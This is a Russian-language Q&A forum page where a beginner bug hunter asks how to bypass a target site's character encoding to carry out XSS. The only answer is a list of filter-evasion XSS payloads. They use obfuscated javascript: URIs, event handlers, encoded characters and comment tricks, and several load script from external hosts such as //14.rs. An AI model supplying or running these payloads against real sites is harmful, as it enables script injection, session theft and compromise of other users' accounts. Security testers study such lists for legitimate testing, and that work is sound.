Как я могу обойти некоторые фильтры для атаки XSS в Firefox? - PullRequest
0 голосов
/ 04 мая 2019

Итак, я проверил символы, которые фильтровал целевой сайт, и обнаружил, что он кодирует эти символы =, +,?,:, &,% Эти символы не кодируются '() <> - "\ * {} []. Можно ли обойти эти фильтры и провести атаку xss? Кстати, я новичок с ошибками. Любойбыла бы признательна за помощь!

1 Ответ

0 голосов
/ 10 июля 2019

Потрясающие полезные нагрузки XSS

<A/hREf="j%0aavas%09cript%0a:%09con%0afirm%0d``">z
<d3"<"/onclick="1>[confirm``]"<">z
<d3/onmouseenter=[2].find(confirm)>z
<details open ontoggle=confirm()>
<script y="><">/*<script* */prompt()</script
<w="/x="y>"/ondblclick=`<`[confir\u006d``]>z
<a href="javascript%26colon;alert(1)">click
<a href=javas&#99;ript:alert(1)>click
<script/"<a"/src=data:=".<a,[8].some(confirm)>
<svg/x=">"/onload=confirm()//
<--`<img/src=` onerror=confirm``> --!>
<svg%0Aonload=%09((pro\u006dpt))()//
<sCript x>(((confirm)))``</scRipt x>
<svg </onload ="1> (_=prompt,_(1)) "">
<!--><script src=//14.rs>
<embed src=//14.rs>
<script x=">" src=//15.rs></script>
<!'/*"/*/'/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //>
<iframe/src \/\/onload = prompt(1)
<x oncut=alert()>x
<svg onload=write()>
...